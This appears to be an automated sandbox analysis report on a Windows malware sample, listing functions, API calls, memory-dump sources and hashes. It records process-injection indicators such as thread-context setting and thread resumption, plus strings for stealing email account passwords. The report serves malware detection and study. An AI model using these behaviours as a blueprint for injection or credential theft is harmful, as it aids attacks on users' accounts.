Opcode ID: deda042df5576c68e2d712b14e072b26dbbf3326b8a02101455447f6c390b201
Instruction ID: 21fbcf3f35ce33916165fff900a90974493ebf378120c1a7c8f820c5f290194b
Opcode Fuzzy Hash: deda042df5576c68e2d712b14e072b26dbbf3326b8a02101455447f6c390b201
Instruction Fuzzy Hash: D731A8B9D002589FCF10DFA9D984ADEFBB1BB59310F10A42AE815B7210D735A946CF64

Function 08F3DC48 Relevance: 1.6, APIs: 1, Instructions: 99threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 08F3DCFF

Memory Dump Source

Source File: 00000009.00000002.1755836099.0000000008F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_8f30000_mexnJkivovwH.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 642ccbb2158eea5d703c008b2ffb5fe138581ea19b82945c47b0078b71f63ac7
Instruction ID: 38b4d0945418d96144d7f71e2ef246f3352f6a34448a47cd322d842e4e2fb1b5
Opcode Fuzzy Hash: 642ccbb2158eea5d703c008b2ffb5fe138581ea19b82945c47b0078b71f63ac7
Instruction Fuzzy Hash: D041CCB5D012589FCB10DFA9D884AEEBBF1BF49314F24902AE418B7240D779AA46CF54

Function 023FC424 Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 023FF761

Memory Dump Source

Source File: 00000009.00000002.1748869855.00000000023F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_23f0000_mexnJkivovwH.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 5965f58fd82df95025dd1cedf61797c3de143ac707f37b74202ae3041612e10a
Instruction ID: e0696aebb6d7192b49677c075d94d9310f3c7d8b6fdbd08ad221a471f84cd191
Opcode Fuzzy Hash: 5965f58fd82df95025dd1cedf61797c3de143ac707f37b74202ae3041612e10a
Instruction Fuzzy Hash: C44147B8A00309CFCB54CF99D488AAAFBF5FB88314F24C459D519A7761D730A845CFA0

Function 00A78468 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 00A7850F

Memory Dump Source

Source File: 00000009.00000002.1748567440.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_a70000_mexnJkivovwH.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: a05b508baf665207d3e88e2da340b70df06884e5351b286d5afbc75809474338
Instruction ID: d9d65bc9136eeaa17786b2200a8d2342d4e9b55b8c002936f2f6ec446bc2cf7c
Opcode Fuzzy Hash: a05b508baf665207d3e88e2da340b70df06884e5351b286d5afbc75809474338
Instruction Fuzzy Hash: 993189B9D042589FCB10CFA9D984ADEFBF1BB19310F24902AE818B7350D775A945CF64

Function 08F3DC50 Relevance: 1.6, APIs: 1, Instructions: 94threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 08F3DCFF

Memory Dump Source

Source File: 00000009.00000002.1755836099.0000000008F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_8f30000_mexnJkivovwH.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: ac2d259c32c3aee353571d1d9512afe007c0982db16898c8a35e3c409e0e0840
Instruction ID: 234ede0bb664eecc757989c5639cce98b805cd9c801f04a83fb1cfcacadfd473
Opcode Fuzzy Hash: ac2d259c32c3aee353571d1d9512afe007c0982db16898c8a35e3c409e0e0840
Instruction Fuzzy Hash: 7231BBB4D002589FCB10DFAAD884AEEFBF1BF49310F24802AE418B7240D738A945CF64

Function 04A911B0 Relevance: 1.6, APIs: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 04A91253

Memory Dump Source

Source File: 00000009.00000002.1753952536.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4a90000_mexnJkivovwH.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 49d585069d4aa5ad8bdd9ef105016a59a6650e71ed353798a82aea1e410ca09e
Instruction ID: 0b66db44ee7ed6b57af453ff5e39c92644f4cb6d0ea7ceb12f41a20749641547
Opcode Fuzzy Hash: 49d585069d4aa5ad8bdd9ef105016a59a6650e71ed353798a82aea1e410ca09e
Instruction Fuzzy Hash: 7031A8B8D01248AFCF14CFA9D584A9EFBF1BB49310F14906AE818BB310D335A945CF54

Function 04A911B8 Relevance: 1.6, APIs: 1, Instructions: 85windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 04A91253

Memory Dump Source

Source File: 00000009.00000002.1753952536.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4a90000_mexnJkivovwH.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 863df7606e29a66998f2bdc14ee209dfccd7db9bfe868f41bad047e16720778b
Instruction ID: aa3845991e8d20678676e6f9e99485cfc7884a50604e81ec279bc774c65d296f
Opcode Fuzzy Hash: 863df7606e29a66998f2bdc14ee209dfccd7db9bfe868f41bad047e16720778b
Instruction Fuzzy Hash: B43167B9D002589FCF14DFA9D584A9EFBF5BB49310F14902AE818BB310D735A945CF64

Function 00A79EA0 Relevance: 1.6, APIs: 1, Instructions: 81COMMON

Download Yara Rule

APIs

OutputDebugStringW.KERNELBASE(?), ref: 00A7A852

Memory Dump Source

Source File: 00000009.00000002.1748567440.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_a70000_mexnJkivovwH.jbxd

Similarity

API ID: DebugOutputString
String ID:
API String ID: 1166629820-0
Opcode ID: 14e844bdd55525500e2e4d8ea6ab4e7499adb6c08b9619eb5ab9bc7698875a57
Instruction ID: 0c7ecb72099a1c653d0fe0374d91d9aba1cf67ee84a4a520fbc4378c16408f60
Opcode Fuzzy Hash: 14e844bdd55525500e2e4d8ea6ab4e7499adb6c08b9619eb5ab9bc7698875a57
Instruction Fuzzy Hash: D431BCB4D002489FCB14CFA9D984ADEFBF1AB59310F14906AE818B7360D734A945CFA5

Function 00A7A7B0 Relevance: 1.6, APIs: 1, Instructions: 81COMMON

Download Yara Rule

APIs

OutputDebugStringW.KERNELBASE(?), ref: 00A7A852

Memory Dump Source

Source File: 00000009.00000002.1748567440.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_a70000_mexnJkivovwH.jbxd

Similarity

API ID: DebugOutputString
String ID:
API String ID: 1166629820-0
Opcode ID: 9b6247de385ecded09dabd93c64389b21bb469e429a7a55353778d31d9fd25c2
Instruction ID: 74d4717feda95a2700cdc18c721a0d984b126a42e0d99cb607ac58f26a3fa41a
Opcode Fuzzy Hash: 9b6247de385ecded09dabd93c64389b21bb469e429a7a55353778d31d9fd25c2
Instruction Fuzzy Hash: 7B31DDB4D002489FCB14CFAAD984ADEFBF1AF49310F14906AE818B7360D734A946CF65

Function 023F6440 Relevance: 1.6, APIs: 1, Instructions: 76COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(?), ref: 023F64D2

Memory Dump Source

Source File: 00000009.00000002.1748869855.00000000023F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_23f0000_mexnJkivovwH.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 8c7f5ad66d5f90e29a061bf3bf2e5905da589688f07608150372e16ebd345ccb
Instruction ID: 5531f8f7730487a149f4ba7de29f6e6f2348f24f2491874a530ece40dc274a75
Opcode Fuzzy Hash: 8c7f5ad66d5f90e29a061bf3bf2e5905da589688f07608150372e16ebd345ccb
Instruction Fuzzy Hash: 6C31D9B4D002089FCB14CFAAE984ADEFBF5AB49310F14906AE918B7320D334A945CF64

Function 08F3D725 Relevance: 1.6, APIs: 1, Instructions: 75threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(?), ref: 08F3D7A6

Memory Dump Source

Source File: 00000009.00000002.1755836099.0000000008F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_8f30000_mexnJkivovwH.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: af19b50b776a86bad53262220b672788f4876a0c1c6ddc33ca3c86f34e3bcd21
Instruction ID: 9e78f5f0da92aae3797653e570c5fd025f4873b5574e774e831270fb41f2e5fb
Opcode Fuzzy Hash: af19b50b776a86bad53262220b672788f4876a0c1c6ddc33ca3c86f34e3bcd21
Instruction Fuzzy Hash: 2B31CCB4D012189FCB14DFA9D884ADEFBF5AF49310F14942AE819B7340D735A901CF54

Function 08F3D728 Relevance: 1.6, APIs: 1, Instructions: 73threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(?), ref: 08F3D7A6

Memory Dump Source

Source File: 00000009.00000002.1755836099.0000000008F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_8f30000_mexnJkivovwH.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: a1deab256f68ef631ac3ffd6b8ca359f3cfa060e8e3864eeeaa28bfced6c5f35
Instruction ID: 4aa5317ceca031dda2d72914b4551d32a61fe150a7790602b73edf5469fe1d11
Opcode Fuzzy Hash: a1deab256f68ef631ac3ffd6b8ca359f3cfa060e8e3864eeeaa28bfced6c5f35
Instruction Fuzzy Hash: 8E31AAB4D012189FCB14DFAAD985A9EFBF5AB49310F14942AE819B7340C735A941CF64

Function 00A7A8A8 Relevance: 1.3, APIs: 1, Instructions: 75COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?), ref: 00A7A92E

Memory Dump Source

Source File: 00000009.00000002.1748567440.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_a70000_mexnJkivovwH.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: aba1bc3e103e246007e9942a2d18e0ebe8f0c92635e7b0d7ef614a4b05443522
Instruction ID: 531a59c865ce9f5b629c436e31c9fe6c7498caa805d9b432c28aa450608b4ddf
Opcode Fuzzy Hash: aba1bc3e103e246007e9942a2d18e0ebe8f0c92635e7b0d7ef614a4b05443522
Instruction Fuzzy Hash: 7D31BDB4D002589FCB10CFA9D884AEEFBF0AB49320F14905AE859B3351C379A946CF64

Function 00A79EAC Relevance: 1.3, APIs: 1, Instructions: 73COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?), ref: 00A7A92E

Memory Dump Source

Source File: 00000009.00000002.1748567440.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_a70000_mexnJkivovwH.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 34a14aa36dbe03a19b753ebc1edbdc0fd9a1adb0ed789f218f8a6eb451a741f2
Instruction ID: 0fd3ac226297814fd60fe7e82c8f2700d9a2b50df8f6ebe08e0580662fa77dd6
Opcode Fuzzy Hash: 34a14aa36dbe03a19b753ebc1edbdc0fd9a1adb0ed789f218f8a6eb451a741f2
Instruction Fuzzy Hash: 3B31BDB4D042189FCB10CFA9D884AEEFBF4AB49310F14906AE918B3350D375A945CFA5

Function 006ED4D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1746850983.00000000006ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 006ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6ed000_mexnJkivovwH.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e155bf96b193a522b1a49ccc1fa57fe51be97b7be1f1c214986b04a6c50d4b0
Instruction ID: fe78f50a8847777a544103a0d448b456cc334bae66edd01edc5c4192ca7826d7
Opcode Fuzzy Hash: 4e155bf96b193a522b1a49ccc1fa57fe51be97b7be1f1c214986b04a6c50d4b0
Instruction Fuzzy Hash: B92128B1505380DFCB05DF14D9C4B26BFA6FB98328F24C569D90A0B356C336D856C7A1

Function 0080D1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1746971785.000000000080D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0080D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_80d000_mexnJkivovwH.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8eaf4374d0095b8bfe5620e1c228d70cf1ee0dab1a487eea304fb15d3f0c1bf4
Instruction ID: 6704e126717ab44ac4af6d15ec9c4fa87feeacb0e3873db176605ee6948dee48
Opcode Fuzzy Hash: 8eaf4374d0095b8bfe5620e1c228d70cf1ee0dab1a487eea304fb15d3f0c1bf4
Instruction Fuzzy Hash: AC21F571604304EFDB45DF94D9C4B25BBA5FB94314F24C66DE80A8B392C336E816CA61

Function 0080D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1746971785.000000000080D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0080D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_80d000_mexnJkivovwH.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 805bcea7896fde9c2f5a675c962158bb3f97337aacf0b3388843ebe200f7d012
Instruction ID: 4530392fa390b0b12cae251cad62b89f6fdc449411f0e35c7bc58c8a5965ad78
Opcode Fuzzy Hash: 805bcea7896fde9c2f5a675c962158bb3f97337aacf0b3388843ebe200f7d012
Instruction Fuzzy Hash: 872100B1604704EFDB54DF54D884B26BBA5FB84324F20C969D80E8B382C33AD807CA61

Function 006ED4D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1746850983.00000000006ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 006ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6ed000_mexnJkivovwH.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
Instruction ID: c4403dbc203c69ef8ba4d9321f76a1acb67d0e6ead0807e7fae21d9fa3a4e9e1
Opcode Fuzzy Hash: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
Instruction Fuzzy Hash: A711AF76504380DFCB16CF14D9C4B56BF72FB94324F24C6A9D9090B256C33AD85ACBA1

Function 0080D017 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1746971785.000000000080D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0080D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_80d000_mexnJkivovwH.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
Instruction ID: e381281374c8cd2bbc3f067ab83887ad8559ba22262f799c305cd43676926617
Opcode Fuzzy Hash: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
Instruction Fuzzy Hash: 7711BE75504780CFCB11CF54D9C4B15BB62FB44324F24C6A9D8098B696C33AD80ACB62

Function 0080D1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1746971785.000000000080D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0080D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_80d000_mexnJkivovwH.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
Instruction ID: d36b978bc39c44d8d6a77c1ed41912234527ceb7fb0b98a20fccba48db2d204a
Opcode Fuzzy Hash: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
Instruction Fuzzy Hash: A811BB75904380DFDB02CF54C9C4B15BBB2FB84324F24C6ADD8498B696C33AE80ACB61

Analysis Process: mexnJkivovwH.exePID: 8124, Parent PID: 7908COMMON

Execution Graph

Execution Coverage:	3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	1.3%
Total number of Nodes:	300
Total number of Limit Nodes:	13

Executed Functions

Function 00402B7C Relevance: 3.0, APIs: 2, Instructions: 20
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

Memory Dump Source

Source File: 0000000D.00000002.1742337265.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_mexnJkivovwH.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
Instruction ID: b98118a04cfb303fc975c2cf6dbcabe8739d57b69ee549b18d4bacd194132a09
Opcode Fuzzy Hash: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
Instruction Fuzzy Hash: 14D05E36A01A24B7CA212FD5AC09FCA7F2CEF48BE6F044031FB0CAA290D675D91047D9

Function 00413866 Relevance: 4.6, APIs: 3, Instructions: 147
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000003,00000000,D1E96FCD,00000000,00000000,00000000,00000000), ref: 00413885
CreateMutexW.KERNELBASE(00000000,00000001,00000000,00000000,CF167DF4,00000000,00000000), ref: 0041399C
GetLastError.KERNEL32 ref: 0041399E

Memory Dump Source

Source File: 0000000D.00000002.1742337265.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_mexnJkivovwH.jbxd

Yara matches

Similarity

API ID: Error$CreateLastModeMutex
String ID:
API String ID: 3448925889-0
Opcode ID: 24802840a9e80e41c8200fa87372d6a1c573b20100aacb3c492bf68185cebf66
Instruction ID: 7738172b6d33d5602fc402945caed90a0cea100ae195543e4e9fee3f6653e559
Opcode Fuzzy Hash: 24802840a9e80e41c8200fa87372d6a1c573b20100aacb3c492bf68185cebf66
Instruction Fuzzy Hash: 11415E61964348A8EB10ABF1AC82EFFA738EF54755F10641FF504F7291E6794A80836E

Function 00404A52 Relevance: 3.1, APIs: 2, Instructions: 63
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

RegOpenKeyExA.KERNELBASE(00000032,?,00000000,00020119,00000000,00000009,F4B4ACDC,00000000,00000000,MachineGuid,00000032,00000000,00413DA5,00413987), ref: 00404A9A
RegQueryValueExA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000009,00000009,FE9F661A,00000000,00000000), ref: 00404ABC

Memory Dump Source

Source File: 0000000D.00000002.1742337265.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_mexnJkivovwH.jbxd

Yara matches

Similarity

API ID: Heap$AllocateOpenProcessQueryValue
String ID:
API String ID: 1425999871-0
Opcode ID: 61234e47739be8c7060a32ecdecb60308da47ea11066a787c608e0506b8bf0d5
Instruction ID: c751ae4fb1a51baa23b068920df28fa5e45e9ad9ad003da97b765f6d6e9ada80
Opcode Fuzzy Hash: 61234e47739be8c7060a32ecdecb60308da47ea11066a787c608e0506b8bf0d5
Instruction Fuzzy Hash: A301B1B264010C7EEB01AED69C86DBF7B2DDB81798B10003EF60475182EAB59E1156B9

Function 00404DF3 Relevance: 1.5, APIs: 1, Instructions: 13
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSAStartup.WS2_32(00000202,?), ref: 00404E08

Memory Dump Source

Source File: 0000000D.00000002.1742337265.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_mexnJkivovwH.jbxd

Yara matches

Similarity

API ID: Startup
String ID:
API String ID: 724789610-0
Opcode ID: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
Instruction ID: edfb6e6a7b2c2d2c81179f298452045bbfcf768a57aceb16f5d93ae35c4528ea
Opcode Fuzzy Hash: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
Instruction Fuzzy Hash: 6EC08C32AA421C9FD750AAB8AD0FAF0B7ACD30AB02F0002B56E1DC60C1E550582906E2

Function 00402C1F Relevance: 1.5, APIs: 1, Instructions: 12
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNELBASE(?,00000000,E811E8D4,00000000,00000000), ref: 00402C34

Memory Dump Source

Source File: 0000000D.00000002.1742337265.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_mexnJkivovwH.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 1e00aa432103c00395cacdadc05548eaee9b0074d701dd53c2a9d16b249f06e7
Instruction ID: cd53f9395925d29cf68d66af6aae64644fca58afce9bbcd5edfe8b9605b00cd0
Opcode Fuzzy Hash: 1e00aa432103c00395cacdadc05548eaee9b0074d701dd53c2a9d16b249f06e7
Instruction Fuzzy Hash: C9B092B00082083EAA002EF59C05C7F3A4DDA4410874044397C08E5411F937DE1012A5

Function 00413A3F Relevance: 1.5, APIs: 1, Instructions: 12
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(00000000,00000000,E567384D,00000000,00000000,?,00413B8D,00000000,?,?,004139CC,00000000), ref: 00413A54

Memory Dump Source

Source File: 0000000D.00000002.1742337265.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_mexnJkivovwH.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 28892627b4184eb34835cb905e0569b311a61ada9086cb921d1e57989bacd3e5
Instruction ID: a51fc36abc950c8e07eb8ba8f8e19e2949325f4e0a3e122df0d5a7568418e784
Opcode Fuzzy Hash: 28892627b4184eb34835cb905e0569b311a61ada9086cb921d1e57989bacd3e5
Instruction Fuzzy Hash: 52B092B11042087EAA402EF19C05D3B3A4DCA44508B0044357C08E5422E936EE2050A4

Function 004049FF Relevance: 1.5, APIs: 1, Instructions: 11
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegCloseKey.KERNELBASE(00000000,00000009,D980E875,00000000,00000000,?,00404A44,?,?,00404AC6,?), ref: 00404A15

Memory Dump Source

Source File: 0000000D.00000002.1742337265.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_mexnJkivovwH.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: fd13a4ababa05b6dfa8c376aed1a70cd2f6ce4ef8af563d78b915090b99271a8
Instruction ID: 75bcc15c4d71fff8019d16f1d9debb39272117f3de5fdcc107556e34aff8dcac
Opcode Fuzzy Hash: fd13a4ababa05b6dfa8c376aed1a70cd2f6ce4ef8af563d78b915090b99271a8
Instruction Fuzzy Hash: 7CC092312843087AEA102AE2EC0BF093E0D9B41F98F500025B61C3C1D2E9E3E6100099

Non-executed Functions

Function 0040434D Relevance: 15.1, APIs: 10, Instructions: 135memorycomCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0040438F
CoCreateInstance.OLE32(00418EC0,00000000,00000001,00418EB0,?), ref: 004043A9
VariantInit.OLEAUT32(?), ref: 004043C4
SysAllocString.OLEAUT32(?), ref: 004043CD
VariantInit.OLEAUT32(?), ref: 00404414
SysAllocString.OLEAUT32(?), ref: 00404419
VariantInit.OLEAUT32(?), ref: 00404431

Memory Dump Source

Source File: 0000000D.00000002.1742337265.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_mexnJkivovwH.jbxd

Yara matches

Similarity

API ID: InitVariant$AllocString$CreateInitializeInstance
String ID:
API String ID: 1312198159-0
Opcode ID: 513fbf6384ec98fcae1358c4661a671bc025351e7b653efb5643f1f3667a8473
Instruction ID: 6cc2ba4480fbb4d68866773ab5e076051400aafb7d2546f6199fc19a864342a4
Opcode Fuzzy Hash: 513fbf6384ec98fcae1358c4661a671bc025351e7b653efb5643f1f3667a8473
Instruction Fuzzy Hash: 9A414C71A00609EFDB00EFE4DC84ADEBF79FF89314F10406AFA05AB190DB759A458B94

Function 0040D069 Relevance: 12.6, Strings: 10, Instructions: 138COMMON

Download Yara Rule

Strings

Technology, xrefs: 0040D08D
PopPort, xrefs: 0040D0A7
SmtpPort, xrefs: 0040D0EB
SmtpAccount, xrefs: 0040D0FA
SmtpPassword, xrefs: 0040D117
PopAccount, xrefs: 0040D0B6
PopServer, xrefs: 0040D099
PopPassword, xrefs: 0040D0D0
EmailAddress, xrefs: 0040D074
SmtpServer, xrefs: 0040D0DC

Memory Dump Source

Source File: 0000000D.00000002.1742337265.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_mexnJkivovwH.jbxd

Yara matches

Similarity

API ID:
String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
API String ID: 0-2111798378
Opcode ID: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
Instruction ID: 091e628055053f5eef329adcdd4db079f25726ad560f051e033024c376855220
Opcode Fuzzy Hash: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
Instruction Fuzzy Hash: AE414EB5941218BADF127BE6DD42F9E7F76EF94304F21003AF600721B2C77A99609B48

Function 00404ED4 Relevance: 1.5, APIs: 1, Instructions: 9networkCOMMON

Download Yara Rule

APIs

recv.WS2_32(00000000,00000000,00000FD0,00000000), ref: 00404EE2

Memory Dump Source

Source File: 0000000D.00000002.1742337265.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_mexnJkivovwH.jbxd

Yara matches

Similarity

API ID: recv
String ID:
API String ID: 1507349165-0
Opcode ID: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
Instruction ID: cd18cecc4e97c8ae47002f9e4185d290addc31a5a75b3629954b28b764c5713b
Opcode Fuzzy Hash: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
Instruction Fuzzy Hash: 6EC0483204020CFBCF025F81EC05BD93F2AFB48760F448020FA1818061C772A520AB88

Function 0040317B Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1742337265.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_mexnJkivovwH.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
Instruction ID: 125f84157e295c2adc52e6f8c9cb261871d96e12da6c9e12f7e31892ee598d11
Opcode Fuzzy Hash: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
